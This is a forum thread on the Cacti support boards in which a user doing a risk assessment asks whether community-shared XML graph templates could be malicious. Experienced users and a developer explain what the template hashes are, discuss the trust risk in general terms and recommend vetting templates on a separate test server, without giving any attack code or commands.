Hello Cacti Enthusiasts,
I have recently installed Cacti 0.8.7e and have a question about the .XML coded graph templates that are posted by other users. How secure are these templates? Has anyone found any with malicious intent such as, pointing traffic out of your intranet to a remote server? As working for a company that wishes to implement this RRD graphic tool, I have a multitude of risk assessments to produce based on a preliminary investigation. I know there are associated risks with SQL injections and php alterations in previous versions of Cacti, have all of these been addressed? I could not find specific information in the release notes. I do not speak XML so I was really looking for some insight into these templates.
Thank you very much for your time in advance gentlemen,
SecurityPro
Cacti Security
Moderators: Developers, Moderators
1) moving to a forum with a wider audience.
2) I've never heard of anything like that happening with altering the xml templates. Feel free to look through the XML parsing code, analyze it yourself, and come to your own conclusions. "speaking" XML isn't that hard really -- have you look at a xml file in a web browser?
2) I've never heard of anything like that happening with altering the xml templates. Feel free to look through the XML parsing code, analyze it yourself, and come to your own conclusions. "speaking" XML isn't that hard really -- have you look at a xml file in a web browser?
| Scripts: Monitor processes | RFC1213 MIB | DOCSIS Stats | Dell PowerEdge | Speedfan | APC UPS | DOCSIS CMTS | 3ware | Motorola Canopy |
| Guides: Windows Install | [HOWTO] Debug Windows NTFS permission problems |
| Tools: Windows All-in-one Installer |
-
SecurityPro
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
Cacti
Yes sir I have, I researched some parts of XML and it seems that it is geared towards being a plain text language, meaning both the pc and the user can interpret the data clearly. The template I really have in question contains a few different sections that incorporate MD5 hashs, which are obviously much less secure than something like Sha-2, but I found it odd that a XML code would even include a hash, is this normal practice? Also where shall I post ? I work in a windows environment so I assumed this was a safe haven.
-
SecurityPro
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
The hash you see is actually a combination of things, some which is outlined here: http://docs.cacti.net/howto:determine_c ... te_version
| Scripts: Monitor processes | RFC1213 MIB | DOCSIS Stats | Dell PowerEdge | Speedfan | APC UPS | DOCSIS CMTS | 3ware | Motorola Canopy |
| Guides: Windows Install | [HOWTO] Debug Windows NTFS permission problems |
| Tools: Windows All-in-one Installer |
-
Howie
- Cacti Guru User
- Posts: 5508
- Joined: Thu Sep 16, 2004 5:53 am
- Location: United Kingdom
- Contact:
As far as I know, for the most part the hashes are just unique IDs, not any kind of checksum, so how 'secure' MD5 is vs SHA is not really relevant.
It does bring up another interesting issue though - I can't think of anything that stops someone creating a script query that runs some random command-line and then exporting that for the rest of us to enjoy. I don't really see what you could do to protect against it either, apart from add some restrictions on where the script query command runs from, which doesn't really address the problem.
Ultimately, you are taking software from at least two parties (the Cacti team and the template author), and running it on your systems. If you either don't trust them or don't want to review the code yourself, you should consider that risk. Plenty of people consider the payoff exceeds the risk. Presumably you have done the same analysis for PHP, Mysql, rrdtool, the OS, etc etc etc?
Technology isn't going to help you, without going to some kind of code-signing for templates, and even then you still need to trust whoever is signing the templates.
It does bring up another interesting issue though - I can't think of anything that stops someone creating a script query that runs some random command-line and then exporting that for the rest of us to enjoy. I don't really see what you could do to protect against it either, apart from add some restrictions on where the script query command runs from, which doesn't really address the problem.
Ultimately, you are taking software from at least two parties (the Cacti team and the template author), and running it on your systems. If you either don't trust them or don't want to review the code yourself, you should consider that risk. Plenty of people consider the payoff exceeds the risk. Presumably you have done the same analysis for PHP, Mysql, rrdtool, the OS, etc etc etc?
Technology isn't going to help you, without going to some kind of code-signing for templates, and even then you still need to trust whoever is signing the templates.
Weathermap 0.98a is out! & QuickTree 1.0. Superlinks is over there now (and built-in to Cacti 1.x).
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
-
TheWitness
- Developer
- Posts: 17007
- Joined: Tue May 14, 2002 5:08 pm
- Location: MI, USA
- Contact:
Agreeing with Howie. True understanding begins when we realize how little we truly understand. An in doing so, we first see, understanding, then we can speak from the standpoint of both knowledge and understanding.
You must seek first to understand. That understanding can be sped along by going to http://docs.cacti.net
TheWitness
You must seek first to understand. That understanding can be sped along by going to http://docs.cacti.net
TheWitness
True understanding begins only when we realize how little we truly understand...
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customization's. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who want's a Cacti 1.3/2.0? Streams anyone?
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customization's. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who want's a Cacti 1.3/2.0? Streams anyone?
-
SecurityPro
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
Trust
So would it be safe to say that all templates developed by an author other than BSOD2600 or Howard Jones should be avoided?
(Only trusting the implied good intentions of the developers)
(Only trusting the implied good intentions of the developers)
-
Howie
- Cacti Guru User
- Posts: 5508
- Joined: Thu Sep 16, 2004 5:53 am
- Location: United Kingdom
- Contact:
Re: Trust
Don't trust me. I don't even trust me half the timeSecurityPro wrote:So would it be safe to say that all templates developed by an author other than BSOD2600 or Howard Jones should be avoided?
(Only trusting the implied good intentions of the developers)
Weathermap 0.98a is out! & QuickTree 1.0. Superlinks is over there now (and built-in to Cacti 1.x).
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
-
SecurityPro
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
-
TheWitness
- Developer
- Posts: 17007
- Joined: Tue May 14, 2002 5:08 pm
- Location: MI, USA
- Contact:
The most appropriate methodology to accomplish this is to have two servers:
1) Production
2) Test
Make sure you make backups. Then, you must install the Templates on your Test box. Qualify them, and once qualified, export and import on your production server.
Until we have template signing and certification processes established, this is the most appropriate methodology to utilize.
TheWitness
1) Production
2) Test
Make sure you make backups. Then, you must install the Templates on your Test box. Qualify them, and once qualified, export and import on your production server.
Until we have template signing and certification processes established, this is the most appropriate methodology to utilize.
TheWitness
True understanding begins only when we realize how little we truly understand...
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customization's. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who want's a Cacti 1.3/2.0? Streams anyone?
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customization's. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who want's a Cacti 1.3/2.0? Streams anyone?
Yes maybe having a two server is really a good idea so I guess that is a best thing that we should do for the security of the site. the one is for testing and the one is for the final and functioning one.
_________________
Home Security Systems
_________________
Home Security Systems
Who is online
Users browsing this forum: No registered users and 5 guests